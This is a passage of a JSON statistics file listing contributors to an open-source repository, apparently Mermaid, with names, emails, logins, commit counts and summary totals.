Praveen","email":"praveen@debian.org","login":"pravi","count":1},{"name":"Pierre Gronlier","email":"pierre@gronlier.fr","login":"ticapix","count":1},{"name":"Ivan Sinek","email":"isinek@gmail.com","login":"isinek","count":1},{"name":"Ivan Posti","email":"ivan.posti@jetbrains.com","login":"FirstTimeInForever","count":1},{"name":"Iulian Onofrei","email":"5748627+revolter","login":"revolter","count":1},{"name":"Itprdev","email":"github@itprojekt.ee","login":"itprdev","count":1},{"name":"Inclusive Coding Bot","email":"102100353+inclusive-coding-bot","login":"inclusive-coding-bot","count":1},{"name":"Imma","email":"immasix@gmail.com","login":"imma90","count":1},{"name":"ImgBotApp","email":"ImgBotHelp@gmail.com","login":"ImgBotApp","count":1},{"name":"IceFreez3r","email":"39794212+IceFreez3r","login":"IceFreez3r","count":1},{"name":"mupple","email":"50393087+mupple","login":"mupple","count":1},{"name":"monsterkrampe","email":"monsterkrampe","login":"monsterkrampe","count":1},{"name":"meganemura","email":"meganemura","login":"meganemura","count":1},{"name":"may4everL","email":"weis9004@gmail.com","login":"may4everL","count":1},{"name":"mahimas28","email":"mahima.s2809@gmail.com","login":"mahimas28","count":1},{"name":"loucadufault","email":"40028187+loucadufault","login":"loucadufault","count":1},{"name":"lgasp","email":"liviogasp@hotmail.it","login":"lgasp","count":1},{"name":"legonigel","email":"nigela@google.com","login":"legonigel","count":1},{"name":"laDanz","email":"cdanzmann@gmail.com","login":"laDanz","count":1},{"name":"kuanyi-ng","email":"raionkurane@gmail.com","login":"kuanyi-ng","count":1},{"name":"kgilbert78","email":"kgilbert78@gmail.com","login":"kgilbert78","count":1},{"name":"kerwin612","email":"kerwin612@qq.com","login":"kerwin612","count":1},{"name":"kairi003","email":"kairi.satellite@gmail.com","login":"kairi003","count":1},{"name":"jayaprabhakar","email":"jayaprabhakar@gmail.com","login":"jayaprabhakar","count":1},{"name":"Scott Scherzer","email":"70346066+SlideeScherz","login":"SlideeScherz","count":1},{"name":"Scott Blomquist","email":"sblom@msn.com","login":"sblom","count":1},{"name":"Sahil Nagpure","email":"76729141+SahilNagpure07","login":"SahilNagpure07","count":1},{"name":"SADIK KUZU","email":"sadikkuzu@hotmail.com","login":"sadikkuzu","count":1},{"name":"Róbert Papp","email":"papp.robert.s@gmail.com","login":"TWiStErRob","count":1},{"name":"Rudolf","email":"rud.manusachi@gmail.com","login":"RudolfMan","count":1},{"name":"Royal Jain","email":"royal@codeparrot.ai","login":"royaljain","count":1},{"name":"IamanimalXI","email":"maximilian.moulettes@gmail.com","login":"ImanimalXI","count":1},{"name":"贺天卓","email":"htz@live.cn","login":"hetz","count":1},{"name":"微笑","email":"wang1234561211@outlook.com","login":"try-to-fly","count":1},{"name":"zwPapEr","email":"zw.paper@gmail.com","login":"zwpaper","count":1},{"name":"zephyr","email":"zzzzzzzephyr@gmail.com","login":"zephyraft","count":1},{"name":"zepatrik","email":"zepatrik","login":"zepatrik","count":1},{"name":"yzf","email":"45056231+zhifeiyue","login":"zhifeiyue","count":1},{"name":"ysKim","email":"znxkznxk1030@gmail.com","login":"znxkznxk1030","count":1},{"name":"yoshinorin","email":"yoshinorin.net@outlook.com","login":"yoshinorin","count":1},{"name":"yogitas-ht","email":"yogita@mermaidchart.com","login":"yogitas-ht","count":1},{"name":"wfnuser","email":"wfnuser@126.com","login":"wfnuser","count":1},{"name":"welfuture","email":"wellfuture@qq.com","login":"welfuture","count":1},{"name":"sue","email":"8841319+suelambot","login":"suelambot","count":1},{"name":"silverwind","email":"me@silverwind.io","login":"silverwind","count":1},{"name":"sifb","email":"github-sifb@alysseum.com","login":"sifb","count":1},{"name":"siddhant tripathy","email":"88921213+siddhant-tripathy1","login":"siddhant-tripathy1","count":1},{"name":"samet","email":"sametcn99@gmail.com","login":"sametcn99","count":1},{"name":"salah alhashmi","email":"alhashmis246@gmail.com","login":"alguerocode","count":1},{"name":"ryenus","email":"ryenus@gmail.com","login":"ryenus","count":1},{"name":"root","email":"root@localhost.localdomain","login":"invalid-email-address","count":1},{"name":"ivan-danilov","email":"van.danilov@gmail.com","login":"ivan-danilov","count":1},{"name":"ishuen","email":"12228644+ishuen","login":"ishuen","count":1},{"name":"Alexandre Colucci","email":"738543+Timac","login":"Timac","count":1},{"name":"dix","email":"reg.dev@am35.fr","login":"dix","count":1},{"name":"dev1","email":"dev1@gmail.com","login":"dev1bryant","count":1},{"name":"david weil","email":"tenuki@gmail.com","login":"tenuki","count":1},{"name":"danshuitaihejie","email":"474182370@qq.com","login":"danshuitaihejie","count":1},{"name":"d-faure","email":"d-faure","login":"d-faure","count":1},{"name":"christopherkade","email":"c.kade96@gmail.com","login":"christopherkade","count":1},{"name":"chrismetz09","email":"cymetz@gmail.com","login":"chrismetz09","count":1},{"name":"bolshoytoster","email":"91278344+bolshoytoster","login":"bolshoytoster","count":1},{"name":"bogay","email":"pojay11523@gmail.com","login":"Bogay","count":1},{"name":"beriakomal","email":"80899465+beriakomal","login":"beriakomal","count":1},{"name":"bby-bishopclark","email":"30503374+bby-bishopclark","login":"bby-bishopclark","count":1},{"name":"avijit1258","email":"avijitbhatt1258@gmail.com","login":"avijit1258","count":1},{"name":"atmikeguo","email":"at.mike.guo@gmail.com","login":"mikeguo99","count":1},{"name":"aryandeelwal","email":"aryandeelwal@gmail.com","login":"aryandeelwal","count":1},{"name":"anlai46","email":"76227777+anlai46","login":"anlai46","count":1},{"name":"amsubhash","email":"amsubhash","login":"amsubhash","count":1},{"name":"alec ji","email":"jichao99@outlook.com","login":"JiChao99","count":1},{"name":"agokhale","email":"ash@aeria.net","login":"agokhale","count":1},{"name":"it0a","email":"recursive404@gmail.com","login":"it0a","count":1},{"name":"it-sec-std","email":"fadin.andrey@gmail.com","login":"it-sec-std","count":1},{"name":"Elan Ruusamäe","email":"glen@pld-linux.org","login":"glensc","count":1},{"name":"inverted-capital","email":"69952973+inverted-capital","login":"inverted-capital","count":1},{"name":"hughligit","email":"49313419+hughligit","login":"hughligit","count":1},{"name":"hopoverflow","email":"62627631+hopoverflow","login":"hopoverflow","count":1},{"name":"homersimpsons","email":"guillaume.alabre@gmail.com","login":"homersimpsons","count":1},{"name":"hikerpig","email":"hikerpigwinnie@gmail.com","login":"hikerpig","count":1},{"name":"gomlgs","email":"aparajit@grokstyle.com","login":"gomlgs","count":1},{"name":"flywire","email":"flywire0@gmail.com","login":"flywire","count":1},{"name":"flaura","email":"flaura.dev@gmail.com","login":"raptor0929","count":1},{"name":"exoego","email":"ytatsuno.jp@gmail.com","login":"exoego","count":1},{"name":"esphas","email":"esphas@hotmail.com","login":"esphas","count":1},{"name":"erinleck@gmail.com","email":"erinleck@gmail.com","login":"eel87","count":1},{"name":"endolith","email":"endolith@gmail.com","login":"endolith","count":1},{"name":"docxml","email":"docxml","login":"docxml","count":1},{"name":"dkkb","email":"82504881+dkkb","login":"dkkb","count":1},{"name":"Michael K","email":"krausem@dickinson.edu","login":"Mikek16","count":1},{"name":"Federico","email":"me@fregante.com","login":"fregante","count":1},{"name":"Fabien Savy","email":"fab.alchemy@gmail.com","login":"fabalchemy","count":1},{"name":"Erhannis","email":"Eyeillus@gmail.com","login":"Erhannis","count":1},{"name":"Sibin Thomas","email":"sibin.thomas@iiitb.ac.in","login":"sibin-thomas-iiitb","count":1},{"name":"Petr Korolev","email":"sky4winder@gmail.com","login":"skywinder","count":1},{"name":"Paweł Gajda","email":"saulgajda@gmail.com","login":"saulgajda","count":1},{"name":"Ejiah","email":"yosapoljittarak@hotmail.com","login":"Eji4h","count":1},{"name":"Eirik Bjornset","email":"ebjornset@gmail.com","login":"ebjornset","count":1},{"name":"Dustin Breuer","email":"github@dustin-breuer.de","login":"thedustin","count":1},{"name":"Douglas Blank","email":"doug.blank@gmail.com","login":"dsblank","count":1},{"name":"Doug Hill","email":"quickstep25","login":"quickstep25","count":1},{"name":"Doug Finke","email":"finked@hotmail.com","login":"dfinke","count":1},{"name":"Donny Winston","email":"dwinston@alum.mit.edu","login":"dwinston","count":1},{"name":"Dominik Meyer","email":"50320942+dominikmeyersap","login":"dominikmeyersap","count":1},{"name":"Dmitry Kisler","email":"admin@dkisler.com","login":"kislerdm","count":1},{"name":"Dirkjan Bussink","email":"d.bussink@gmail.com","login":"dbussink","count":1},{"name":"Diego Sogari","email":"diego.sogari@gmail.com","login":"dsogari","count":1},{"name":"Derek Brans","email":"dbrans@gmail.com","login":"dbrans","count":1},{"name":"Debjeet Biswas","email":"detj","login":"detj","count":1},{"name":"David Wittman","email":"david@wittman.com","login":"DavidWittman","count":1},{"name":"David Pendray","email":"35926989+davidpendraykalibrate","login":"davidpendraykalibrate","count":1},{"name":"Howard He","email":"howe.personal@gmail.com","login":"LiHowe","count":1},{"name":"Herb Caudill","email":"herb@devresults.com","login":"HerbCaudill","count":1},{"name":"Hal Wine","email":"132412+hwine","login":"hwine","count":1},{"name":"H3RSKO","email":"34112131+H3RSKO","login":"H3RSKO","count":1},{"name":"ischanx","email":"ischanx@foxmail.com","login":"ischanx","count":1},{"name":"isaiah robinson","email":"95643215+internetisaiah","login":"internetisaiah","count":1},{"name":"Dan Fallon","email":"dan@daninprogress.com","login":"DanInProgress","count":1},{"name":"Damilola Mohammed","email":"damilolamohammed2@hotmail.com","login":"activus-d","count":1},{"name":"DCsunset","email":"dcsunset@protonmail.com","login":"DCsunset","count":1},{"name":"Conrad Agramont","email":"41589731+conradagramont","login":"conradagramont","count":1},{"name":"Connor Peet","email":"connor@peet.io","login":"connor4312","count":1},{"name":"Clint Chester","email":"chester.clint@gmail.com","login":"Clint-Chester","count":1},{"name":"Claes Gill","email":"claes@claesgill.com","login":"claesgill","count":1},{"name":"Chuck","email":"84461456+Whoeza","login":"Whoeza","count":1},{"name":"Christian Martin","email":"christian@ctmartin.me","login":"ct-martin","count":1},{"name":"Chidozie Nnachor","email":"odogwu.naija@gmail.com","login":"Odogwudozilla","count":1},{"name":"Charles-André Beaudry","email":"ca_beaudry@yahoo.ca","login":"beaudry","count":1},{"name":"Charles Truelson","email":"charles.truelson@gmail.com","login":"ctruelson","count":1},{"name":"Charles Liu","email":"dodoinblue@gmail.com","login":"dodoinblue","count":1},{"name":"Maicon Schmitz","email":"maiconschmitz@gmail.com","login":"maiconschmitz","count":1},{"name":"Maciej Korycinski","email":"korycinski.maciej@gmail.com","login":"korycins","count":1},{"name":"Luke Hsiao","email":"luke@hsiao.dev","login":"lukehsiao","count":1},{"name":"Lukas Wöhrl","email":"lukas@woehrl.net","login":"woehrl01","count":1},{"name":"Lukas Klingsbo","email":"lukas.klingsbo@gmail.com","login":"spydon","count":1},{"name":"Alexander Münch","email":"theHacker","login":"theHacker","count":1},{"name":"Alejandro Di Leo","email":"ale.dileo17@gmail.com","login":"aledileo","count":1},{"name":"Alan Hohn","email":"Alan.M.Hohn@lmco.com","login":"AlanHohn","count":1},{"name":"Levente Laszlo","email":"leventewww@gmail.com","login":"levlas","count":1},{"name":"Leszek Manicki","email":"leszek.manicki@wikimedia.de","login":"manicki","count":1},{"name":"Leo Toff","email":"lev.taydakov@gmail.com","login":"zaaath","count":1},{"name":"Leo Gallucci","email":"leo.gallucci@zalando.de","login":"elgalu","count":1},{"name":"Lee Sun-Hyoup","email":"kciter@naver.com","login":"kciter","count":1},{"name":"Laurent","email":"lchenay@gmail.com","login":"lchenay","count":1},{"name":"Lance Taylor","email":"46854319+Lance-DC","login":"Lance-DC","count":1},{"name":"Kylie Stewart","email":"kylie@kyliestewart.tech","login":"kale-stew","count":1},{"name":"Kris Khaira","email":"kriskhaira@seekasia.com","login":"kriskhaira","count":1},{"name":"Kiran","email":"kiran@blkmarket.co","login":"keer4n","count":1},{"name":"Kevin Kirsche","email":"Kev.Kirsche+GitHub@gmail.com","login":"kkirsche","count":1},{"name":"Kevin Hill","email":"kevinkhill@gmail.com","login":"kevinkhill","count":1},{"name":"Kenneth Schackart","email":"schackartk1@gmail.com","login":"schackartk","count":1},{"name":"Kees Hink","email":"kees@fourdigits.nl","login":"khink","count":1},{"name":"Michael Genereux","email":"mgenereu@gmail.com","login":"mgenereu","count":1},{"name":"Michael Bodnarchuk","email":"DavertMik","login":"DavertMik","count":1},{"name":"Michael Baudino","email":"michael@baudi.no","login":"michaelbaudino","count":1},{"name":"Max Stanley","email":"github@maxstanley.uk","login":"maxstanley","count":1},{"name":"Max Arturo AS","email":"maxarturo@gmail.com","login":"maxArturo","count":1},{"name":"Daniel Egnor","email":"egnor@ofb.net","login":"egnor","count":1},{"name":"Daniel Compton","email":"desk@danielcompton.net","login":"danielcompton","count":1},{"name":"Aiello","email":"Aiello.Chan@Gmail.com","login":"AielloChan","count":1},{"name":"Sophie Dankel","email":"sdankel@convoy.com","login":"sdankel","count":1},{"name":"Soptq","email":"32592090+Soptq","login":"Soptq","count":1},{"name":"Soren L. Hansen","email":"sorenisanerd@gmail.com","login":"sorenisanerd","count":1},{"name":"SteffenLm","email":"33038091+SteffenLm","login":"SteffenLm","count":1},{"name":"StefonSimmons","email":"57869435+StefonSimmons","login":"StefonSimmons","count":1},{"name":"Steve Wirt","email":"swirtSJW","login":"swirtSJW","count":1},{"name":"Steven Engler","email":"smengler3@gmail.com","login":"stevenengler","count":1},{"name":"Steven Schobert","email":"spschobert@gmail.com","login":"stevenschobert","count":1},{"name":"Susheel Thapa","email":"83917129+SusheelThapa","login":"SusheelThapa","count":1},{"name":"SwhGo_oN","email":"swhgoon","login":"swhgoon","count":1},{"name":"Alexandre Djerbetian","email":"alexandre.djerbetian@gmail.com","login":"adjerbetian","count":1},{"name":"Alexis Lefebvre","email":"alexislefebvre","login":"alexislefebvre","count":1},{"name":"Aliaksandr Zahatski","email":"github.send@zag.ru","login":"zag","count":1},{"name":"Alvyn McQuitty","email":"alvynmcq@gmail.com","login":"alvynmcq","count":1},{"name":"Trey Evans","email":"lewis.r.evans@gmail.com","login":"TreyE","count":1},{"name":"Tomáš Hübelbauer","email":"tomas@hubelbauer.net","login":"TomasHubelbauer","count":1},{"name":"Tom Schmelzer","email":"30869493+schmelto","login":"schmelto","count":1},{"name":"Tobie Langel","email":"tobie@unlockopen.com","login":"tobie","count":1},{"name":"Tibor Claassen","email":"tibor@gmah.net","login":"codebeige","count":1},{"name":"Thomas Karner","email":"thomas.7.karner@gmail.com","login":"KarnerTh","count":1},{"name":"The Gitter Badger","email":"badger@gitter.im","login":"gitter-badger","count":1},{"name":"Adam Meech","email":"meech.adam@gmail.com","login":"ameech","count":1},{"name":"Adam Hotait","email":"adam@hotait.fr","login":"adam-hotait","count":1},{"name":"Aaron Dutton","email":"adutton@gmail.com","login":"adutton","count":1},{"name":"Aaron Collier","email":"aaron@collier.cz","login":"CollierCZ","count":1},{"name":"Anthony","email":"anthonyco@hotmail.com","login":"antco25","count":1},{"name":"Anna Tomanek","email":"a.tomanek@cksource.com","login":"AnnaTomanek","count":1},{"name":"Aniston","email":"aniston","login":"aniston","count":1},{"name":"Anish Karandikar","email":"anishkny@gmail.com","login":"anishkny","count":1},{"name":"Andy Barlow","email":"andy.barlow@okta.com","login":"6footgeek","count":1},{"name":"Andriy","email":"86450120+andriy-koz","login":"andriy-koz","count":1},{"name":"Andrii Dembitskyi","email":"andrew.dembitskiy@gmail.com","login":"andrew-demb","count":1},{"name":"Andrew Schleifer","email":"me@andrewschleifer.name","login":"andrewschleifer","count":1},{"name":"Andrew Martin","email":"sublimino@gmail.com","login":"sublimino","count":1},{"name":"Andrew Liu","email":"aliu2@ufl.edu","login":"AndrewL-64","count":1},{"name":"Andrea D","email":"andrea.dessi@onefootball.com","login":"NKjoep","count":1},{"name":"Anders Jürisoo","email":"jurisoo@hotmail.com","login":"ajthinking","count":1},{"name":"Anatoli Babenia","email":"anatoli@rainforce.org","login":"abitrolly","count":1},{"name":"Amy Qualls","email":"1157888+amyq","login":"amyq","count":1},{"name":"AlwinW","email":"16846521+AlwinW","login":"AlwinW","count":1},{"name":"Simon Marquis","email":"contact@simon-marquis.fr","login":"SimonMarquis","count":1},{"name":"Simon Plattner","email":"5527585+simonplattner","login":"simonplattner","count":1},{"name":"jjmr","email":"jjmr@tid.es","login":null,"count":1},{"name":"Mark Qian","email":"kunqian@live.ca","login":"markqian","count":1},{"name":"Mark Dalgleish","email":"mark.john.dalgleish@gmail.com","login":"markdalgleish","count":1},{"name":"Marc Jansen","email":"jansen@terrestris.de","login":"marcjansen","count":1},{"name":"Manuel Vacelet","email":"vaceletm","login":"vaceletm","count":1},{"name":"Kathryn DiPippo","email":"dipippo.k@gmail.com","login":"kdipippo","count":1},{"name":"Jason Bellamy","email":"j@sonbellamy.com","login":"jasonbellamy","count":1},{"name":"Jan Verbeek","email":"jverbeek@therp.nl","login":"janverb","count":1},{"name":"Jamie Cox","email":"jc8478@me.com","login":"coxy1989","count":1},{"name":"Jake Boone","email":"jakeboone02@gmail.com","login":"jakeboone02","count":1},{"name":"Jake Beamish","email":"jakebeamish@gmail.com","login":"jakebeamish","count":1},{"name":"JM Marcastel","email":"6306262+marcastel","login":"marcastel","count":1},{"name":"Jorge Fuentes","email":"jfuentes.py@gmail.com","login":"jfuentescpp","count":1},{"name":"Jonathan Young","email":"jonathan.young@kyndryl.com","login":"jonathan-r-young","count":1},{"name":"Jonathan Newnham","email":"jnnnnn@gmail.com","login":"jnnnnn","count":1},{"name":"Jonas Haag","email":"jonas@lophus.org","login":"jonashaag","count":1},{"name":"Jon McEwen","email":"jon_mcewen@hotmail.com","login":"jonmcewen","count":1},{"name":"Joe Bordes","email":"joe@tsolucio.com","login":"joebordes","count":1},{"name":"Jiahao Guo","email":"im@pyonpyon.today","login":"frantic1048","count":1},{"name":"Jeroen Ekkelkamp","email":"58693851+jeroenekkelkamp","login":"jeroenekkelkamp","count":1},{"name":"Jean-Baptiste Cebe","email":"jaybuidl@pm.me","login":"jaybuidl","count":1},{"name":"Jayen Ashar","email":"jayenashar","login":"jayenashar","count":1},{"name":"Patrick Ellis","email":"patrick.j.ellis@gmail.com","login":"pje","count":1},{"name":"Hunter Laux","email":"hunterlaux@gmail.com","login":"jolting","count":1},{"name":"Hugo van Kemenade","email":"hugovk","login":"hugovk","count":1},{"name":"Hugo Gayosso","email":"34578120+TribalNightOwl","login":"TribalNightOwl","count":1},{"name":"Kaligule","email":"Code@schauderbasis.de","login":"Kaligule","count":1},{"name":"Kai","email":"Schweinepriester","login":"Schweinepriester","count":1},{"name":"Kah Goh","email":"villastar@yahoo.com.au","login":"kahgoh","count":1},{"name":"Justin","email":"jgarey02@gmail.com","login":"Justin-Garey","count":1},{"name":"Juanjo Bazán","email":"jjbazan@gmail.com","login":"xuanxu","count":1},{"name":"Josh Junon","email":"josh@junon.me","login":"Qix-","count":1},{"name":"Joseph Melfi","email":"joseph.d.melfi@gmail.com","login":"jmelfi","count":1},{"name":"Joseph Jin-Chuan Tang","email":"jinntrance@gmail.com","login":"jinntrance","count":1},{"name":"Mattéo Delabre","email":"spam@delab.re","login":"matteodelabre","count":1},{"name":"Matthias","email":"matthias-endler@gmx.net","login":"mre","count":1},{"name":"Massimo Santini","email":"massimo.santini@gmail.com","login":"mapio","count":1},{"name":"Martín Gaitán","email":"gaitan@gmail.com","login":"mgaitan","count":1},{"name":"Martin Zaloudek","email":"zaloudek@zal.cz","login":"ma-zal","count":1},{"name":"Martin Staffa","email":"mjstaffa@gmail.com","login":"Narretz","count":1},{"name":"Martin Pedersen","email":"denmark4u@gmail.com","login":"Patronud","count":1},{"name":"Martijn Swaagman","email":"martijn@swaagman.online","login":"Swaagie","count":1},{"name":"Marko Tibold","email":"marko@tibold.nl","login":"markotibold","count":1},{"name":"Jason Houle","email":"jasonmhoule@gmail.com","login":"jasonmhoule","count":1},{"name":"Guy Ellis","email":"wildfiction@gmail.com","login":"guyellis","count":1},{"name":"Guilherme Pasqualino","email":"ggpasqualino@gmail.com","login":"ggpasqualino","count":1},{"name":"Guilherme Dantas","email":"guidanoli@hotmail.com","login":"guidanoli","count":1},{"name":"Gozie Joshua","email":"36326251+guzzit","login":"guzzit","count":1},{"name":"GitHub actions","email":"actions","login":"actions","count":1},{"name":"Gerrit-Jan Lubbertsen","email":"gerrit-jan@lubbertsen.com","login":"gjlubbertsen","count":1},{"name":"Gerhard Schlager","email":"mail@gerhard-schlager.at","login":"gschlager","count":1},{"name":"Genki Matsunaga","email":"genki.matsunaga@gmail.com","login":"gnkm","count":1},{"name":"GavinPen","email":"GavinPen","login":"GavinPen","count":1},{"name":"Gareth Watts","email":"gareth@omnipotent.net","login":"gwatts","count":1},{"name":"Gabriel Silva","email":"git@gabe.id","login":"gabeidx","count":1},{"name":"Frederic Lavigne","email":"frederic.lavigne@ibm.com","login":"l2fprod","count":1},{"name":"Foo-x","email":"www.sand.x@gmail.com","login":"Foo-x","count":1},{"name":"Florian Kohrt","email":"fkohrt@anche.no","login":"fkohrt","count":1},{"name":"Filipe Deschamps","email":"filiped@gmail.com","login":"filipedeschamps","count":1},{"name":"Dave Glick","email":"dave@daveaglick.com","login":"daveaglick","count":1},{"name":"Casey Watson","email":"watsoncj@gmail.com","login":"watsoncj","count":1},{"name":"Carolin Beer","email":"carolinbeer94@gmail.com","login":"carbeer","count":1},{"name":"Carlos Blanco","email":"carlosomarblanco@gmail.com","login":"carlosblanco","count":1},{"name":"Cameron Yick","email":"hydrosquall","login":"hydrosquall","count":1},{"name":"Daniel Golding","email":"goldingd89@gmail.com","login":"cakemanny","count":1},{"name":"Anthony Damico","email":"ajdamico@gmail.com","login":"ajdamico","count":1},{"name":"C.D. MacEachern","email":"craig.daniel.maceachern@gmail.com","login":"craigmac","count":1},{"name":"Bruno Macherel","email":"macherel","login":"macherel","count":1},{"name":"Bojan Bedrac","email":"bojan@bele-serv.com","login":"xbojch","count":1},{"name":"Bernard Vander Beken","email":"bernard@jawn.net","login":"jawn","count":1},{"name":"Benny Tordrup","email":"bstordrup@gmail.com","login":"bstordrup","count":1},{"name":"Ben Page","email":"bpage@dewalch.com","login":"ben-page","count":1},{"name":"Bastian Ebeling","email":"230051+Barry1","login":"Barry1","count":1},{"name":"Bastiaan Nelissen","email":"bglnelissen","login":"bglnelissen","count":1},{"name":"Baraka Kinywa","email":"bkinywa24@gmail.com","login":"Baraka24","count":1},{"name":"Balthasar Glättli","email":"politbuero-kampagnen","login":"politbuero-kampagnen","count":1},{"name":"Atul Varma","email":"atul@makenotion.com","login":"toolness","count":1},{"name":"Asa Ayers","email":"Asa@AsaAyers.com","login":"AsaAyers","count":1},{"name":"Arthaey","email":"arthaey@gmail.com","login":"Arthaey","count":1},{"name":"Arfan Liaqat","email":"arfanliaqat10@gmail.com","login":"arfanliaqat","count":1},{"name":"Antoine Bolvy","email":"antoine.bolvy@gmail.com","login":"saveman71","count":1},{"name":"DarkNami","email":"DarkNami","login":"DarkNami","count":1},{"name":"Darius Wiles","email":"github@dariuswiles.com","login":"dariuswiles","count":1},{"name":"Danny Ben Shitrit","email":"db@dannyben.com","login":"DannyBen","count":1},{"name":"Daniel Sitnik","email":"daniel.sitnik@gmail.com","login":"danielsitnik","count":1},{"name":"Daniel Olshansky","email":"olshansky.daniel@gmail.com","login":"Olshansk","count":1},{"name":"Louis Orleans","email":"louis@orleans.io","login":"dudeofawesome","count":1}],"total_commits":9406,"total_committers":685,"total_bot_commits":770,"total_bot_committers":4,"mean_commits":13.731386861313869,"dds":0.8248990006378907,"past_year_committers":[{"name":"Sidharth Vinod","email":"sidharthv96@gmail.com","login":"sidharthv96","count":279},{"name":"saurabhg772244","email":"saurabh@mermaidchart.com","login":"saurabhg772244","count":158},{"name":"Knut Sveidqvist","email":"knsv@sveido.com","login":"knsv","count":129},{"name":"yari-dewalt","email":"yari.dewalt@gmail.com","login":"yari-dewalt","count":108},{"name":"autofix-ci[bot]","email":"114827586+autofix-ci[bot]","login":"autofix-ci[bot]","count":107},{"name":"Josh Soref","email":"2119212+jsoref","login":"jsoref","count":105},{"name":"omkarht","email":"omkar@mermaidchart.com","login":"omkarht","count":80},{"name":"Ashish Jain","email":"ashishjain0512@gmail.com","login":"ashishjain0512","count":66},{"name":"renovate[bot]","email":"29139614+renovate[bot]","login":"renovate[bot]","count":58},{"name":"Shahir Ahmed","email":"ahmeds@dickinson.edu","login":"Shahir-47","count":40},{"name":"Steph","email":"35910788+huynhicode","login":"huynhicode","count":39},{"name":"Alois Klink","email":"alois@aloisklink.com","login":"aloisklink","count":37},{"name":"Austin Fulbright","email":"austinfulbright@Austins-Laptop.local","login":null,"count":34},{"name":"github-actions[bot]","email":"github-actions[bot]","login":"github-actions[bot]","count":22},{"name":"rajat-ht","email":"rajat@mermaidchart.com","login":"rajat-ht","count":20},{"name":"shubham-mermaid","email":"shubham@mermaidchart.com","login":"shubham-mermaid","count":20},{"name":"NicolasNewman","email":"nanewman01@gmail.com","login":"NicolasNewman","count":18},{"name":"Thomas Di Cizerone","email":"thomas.cizeron@hotmail.fr","login":"thomascizeron","count":16},{"name":"pranavm2109","email":"mishrap@dickinson.edu","login":"pranavm2109","count":15},{"name":"René Lombard","email":"Rene.Lombard@elekta.com","login":"ReneLombard","count":14},{"name":"Nicholas Bollweg","email":"nick.bollweg@gmail.com","login":"bollwyvl","count":14},{"name":"Austin-Fulbright","email":"53443958+Austin-Fulbright","login":"Austin-Fulbright","count":13},{"name":"nghtlinh","email":"nghtlinh25@gmail.com","login":"monicanguyen25","count":11},{"name":"generrosity","email":"drrugg+github@gmail.com","login":"generrosity","count":10},{"name":"khalil","email":"5alil.landolsi@gmail.com","login":"BambioGaming","count":10},{"name":"Bryan","email":"bryan.crotaz@silvercurve.co.uk","login":"BryanCrotaz","count":9},{"name":"Yash Singh","email":"saiansh2525@gmail.com","login":"Yash-Singh1","count":9},{"name":"megantriplett","email":"megantriplett10@gmail.com","login":"megantriplett","count":8},{"name":"nour kouider","email":"nourkouider05@gmail.com","login":null,"count":6},{"name":"Arpit Jain","email":"3242828+arpitjain099","login":"arpitjain099","count":6},{"name":"Matthieu MOREL","email":"matthieu.morel35@gmail.com","login":"mmorel-35","count":4},{"name":"udvale","email":"enkhtaiu@dickinson.edu","login":"udvale","count":3},{"name":"nourhenta","email":"nour.hentati@medtech.tn","login":"nourhenta","count":3},{"name":"cmmoran","email":"cmmoran","login":"cmmoran","count":3},{"name":"Radmila M.","email":"mila.mana@yandex.ru","login":"Mandzhi","count":3},{"name":"MrCoder","email":"eagle.xiao@gmail.com","login":"MrCoder","count":3},{"name":"Jesse Wright","email":"63333554+jeswr","login":"jeswr","count":3},{"name":"Feroz Mujawar","email":"ferozm@heaptrace.com","login":"ferozmht","count":2},{"name":"André Jaenisch","email":"Ryuno-Ki","login":"Ryuno-Ki","count":2},{"name":"Jesus Briales","email":"jesusbriales@gmail.com","login":"jbriales","count":2},{"name":"Aaron Moat","email":"2937187+AaronMoat","login":"AaronMoat","count":2},{"name":"darshanr0107","email":"darshan@mermaid.com","login":null,"count":2},{"name":"NourBz","email":"nour.benzarti@medtech.tn","login":"NourBenz","count":2},{"name":"Sparsh Prashant Mishra","email":"spmishra@wisc.edu","login":"iSparsh","count":2},{"name":"Tom Moor","email":"tom@getoutline.com","login":"tommoor","count":2},{"name":"g.bremont-ext","email":"g.bremont-ext@betclicgroup.com","login":"gbremond","count":2},{"name":"kimulaco","email":"kimulaco@gmail.com","login":"kimulaco","count":2},{"name":"universeroc","email":"universeroc@gmail.com","login":"universeroc","count":2},{"name":"darshanr0107","email":"darshan@mermaidchart.com","login":"darshanr0107","count":2},{"name":"homersimpsons","email":"guillaume.alabre@gmail.com","login":"homersimpsons","count":1},{"name":"ScriptBloom","email":"1774113002@qq.com","login":"ScriptBloom","count":1},{"name":"Simon Marquis","email":"contact@simon-marquis.fr","login":"SimonMarquis","count":1},{"name":"Tomáš Hübelbauer","email":"tomas@hubelbauer.net","login":"TomasHubelbauer","count":1},{"name":"Yihui Xie","email":"xie@yihui.name","login":"yihui","count":1},{"name":"Zack Katz","email":"zack@katz.co","login":"zackkatz","count":1},{"name":"_Kerman","email":"kermanx@qq.com","login":"KermanX","count":1},{"name":"agokhale","email":"ash@aeria.net","login":"agokhale","count":1},{"name":"docxml","email":"docxml","login":"docxml","count":1},{"name":"inverted-capital","email":"69952973+inverted-capital","login":"inverted-capital","count":1},{"name":"isaiah robinson","email":"95643215+internetisaiah","login":"internetisaiah","count":1},{"name":"jayaprabhakar","email":"jayaprabhakar@gmail.com","login":"jayaprabhakar","count":1},{"name":"kairi003","email":"kairi.satellite@gmail.com","login":"kairi003","count":1},{"name":"samet","email":"sametcn99@gmail.com","login":"sametcn99","count":1},{"name":"Oliver Wolf","email":"info@specify.io","login":null,"count":1},{"name":"sue","email":"8841319+suelambot","login":"suelambot","count":1},{"name":"yogitas-ht","email":"yogita@mermaidchart.com","login":"yogitas-ht","count":1},{"name":"Alexander Münch","email":"theHacker","login":"theHacker","count":1},{"name":"Alexandre Djerbetian","email":"alexandre.djerbetian@gmail.com","login":"adjerbetian","count":1},{"name":"Balthasar Glättli","email":"politbuero-kampagnen","login":"politbuero-kampagnen","count":1},{"name":"Baraka Kinywa","email":"bkinywa24@gmail.com","login":"Baraka24","count":1},{"name":"Gabriel Silva","email":"git@gabe.id","login":"gabeidx","count":1},{"name":"Gozie Joshua","email":"36326251+guzzit","login":"guzzit","count":1},{"name":"Gusted","email":"postmaster@gusted.xyz","login":"Gusted","count":1},{"name":"IceFreez3r","email":"39794212+IceFreez3r","login":"IceFreez3r","count":1},{"name":"Jake Beamish","email":"jakebeamish@gmail.com","login":"jakebeamish","count":1},{"name":"Michael Baudino","email":"michael@baudi.no","login":"michaelbaudino","count":1},{"name":"Michael Vorburger","email":"mike@vorburger.ch","login":"vorburger","count":1},{"name":"Nacho 